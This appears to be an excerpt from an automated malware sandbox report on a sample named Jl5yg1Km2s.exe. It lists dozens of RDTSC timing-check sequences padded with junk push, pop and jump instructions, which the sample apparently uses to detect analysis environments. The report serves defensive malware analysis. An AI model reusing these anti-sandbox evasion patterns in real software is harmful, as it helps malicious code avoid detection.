                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C86674 second address: C8668E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8668E second address: C86692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C867DC second address: C867E6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1CC8BB7C3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C867E6 second address: C867EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C86C5F second address: C86C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C86C63 second address: C86C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C86C6E second address: C86CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007F1CC8BB7C48h 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 je 00007F1CC8BB7C36h 0x0000001b jno 00007F1CC8BB7C36h 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C86CA6 second address: C86CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8CE9B second address: C8CEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8D2B1 second address: C8D2B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8D809 second address: C8D81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C3Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8D81C second address: C8D840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1CC8B8C9E6h 0x0000000a popad 0x0000000b jmp 00007F1CC8B8C9F9h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8DB12 second address: C8DB1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F1CC8BB7C36h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8EB2B second address: C8EB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8EB2F second address: C8EB37 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8EB37 second address: C8EB43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007F1CC8B8C9E6h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8EB43 second address: C8EB4D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CC8BB7C36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8EB4D second address: C8EB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CC8B8C9EAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8EB64 second address: C8EB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C93D26 second address: C93D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C960B0 second address: C960BF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C98F94 second address: C98FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9F4h 0x00000009 jmp 00007F1CC8B8C9F3h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CA4833 second address: CA485C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CC8BB7C41h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1CC8BB7C3Ch 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CA485C second address: CA4861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CA4861 second address: CA4869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CA46D0 second address: CA46D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CA46D4 second address: CA46EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CAC1CF second address: CAC1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F1CC8B8C9E6h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CAC1DE second address: CAC217 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jg 00007F1CC8BB7C73h 0x00000010 push ebx 0x00000011 jng 00007F1CC8BB7C36h 0x00000017 pop ebx 0x00000018 pushad 0x00000019 jmp 00007F1CC8BB7C40h 0x0000001e je 00007F1CC8BB7C36h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CB2778 second address: CB27A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CC8B8C9F0h 0x00000008 jmp 00007F1CC8B8C9F9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CB3D97 second address: CB3D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CB3D9B second address: CB3DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CBC25F second address: CBC268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5DDF second address: CC5DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5DE3 second address: CC5DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5DE7 second address: CC5E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F1CC8B8C9EEh 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F1CC8B8C9E6h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5E01 second address: CC5E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F1CC8BB7C49h 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5E24 second address: CC5E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9ECh 0x00000009 pop edi 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5E35 second address: CC5E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5E3B second address: CC5E48 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5E48 second address: CC5E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1CC8BB7C36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC4C5E second address: CC4C87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F1CC8B8C9F4h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC9861 second address: CC986D instructions: 0x00000000 rdtsc 0x00000002 js 00007F1CC8BB7C3Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CCC5DB second address: CCC5E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CCC1A2 second address: CCC1A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CCC1A6 second address: CCC1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F1CC8B8C9E6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CCC1B9 second address: CCC1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CCC1C6 second address: CCC1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CD5193 second address: CD51D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C47h 0x00000009 pop edi 0x0000000a jmp 00007F1CC8BB7C49h 0x0000000f jbe 00007F1CC8BB7C38h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop eax 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CD51D7 second address: CD51DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CDC7B3 second address: CDC7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CDC7B7 second address: CDC7C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CE07F6 second address: CE0807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 je 00007F1CC8BB7C36h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CE066C second address: CE0670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CE0670 second address: CE0690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1CC8BB7C47h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CDB2AC second address: CDB2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CDB2B8 second address: CDB2BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CEF04C second address: CEF056 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CEED6C second address: CEED83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CEED83 second address: CEED88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D085BB second address: D085C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F1CC8BB7C36h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B01F7 second address: 53B0210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9F5h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0210 second address: 53B0223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 5EA39155h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0223 second address: 53B0228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0228 second address: 53B0264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 09C2h 0x00000007 movsx edx, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [ebp+10h] 0x00000010 jmp 00007F1CC8BB7C42h 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F1CC8BB7C47h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0264 second address: 53B0290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cl, bh 0x0000000d mov si, B0DFh 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0290 second address: 53B0296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0296 second address: 53B029B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B029B second address: 53B02A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B02A1 second address: 53B02BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1CC8B8C9EDh 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B02BB second address: 53B0306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, 7E3Eh 0x00000011 pushfd 0x00000012 jmp 00007F1CC8BB7C3Fh 0x00000017 sbb cl, FFFFFFEEh 0x0000001a jmp 00007F1CC8BB7C49h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0306 second address: 53B030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B030C second address: 53B0310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0310 second address: 53B032D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1CC8B8C9F0h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B032D second address: 53B0331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0331 second address: 53B0337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0337 second address: 53B0350 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0350 second address: 53B0354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0354 second address: 53B035A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B035A second address: 53B0360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0360 second address: 53B03E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1CC8BB7C48h 0x00000011 or ax, 4258h 0x00000016 jmp 00007F1CC8BB7C3Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F1CC8BB7C48h 0x00000022 jmp 00007F1CC8BB7C45h 0x00000027 popfd 0x00000028 popad 0x00000029 je 00007F1D3A735E86h 0x0000002f jmp 00007F1CC8BB7C3Eh 0x00000034 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003b pushad 0x0000003c mov edi, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 movzx eax, bx 0x00000043 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B03E8 second address: 53B0418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F1D3A70AC22h 0x0000000d jmp 00007F1CC8B8C9F1h 0x00000012 mov edx, dword ptr [esi+44h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1CC8B8C9EDh 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0418 second address: 53B0428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0428 second address: 53B0439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0439 second address: 53B0490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f pushad 0x00000010 jmp 00007F1CC8BB7C3Ch 0x00000015 mov bl, ah 0x00000017 popad 0x00000018 jne 00007F1D3A735E5Ah 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F1CC8BB7C46h 0x00000026 pop esi 0x00000027 jmp 00007F1CC8BB7C3Bh 0x0000002c popad 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0490 second address: 53B0496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0496 second address: 53B04C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1CC8BB7C45h 0x00000016 rdtsc
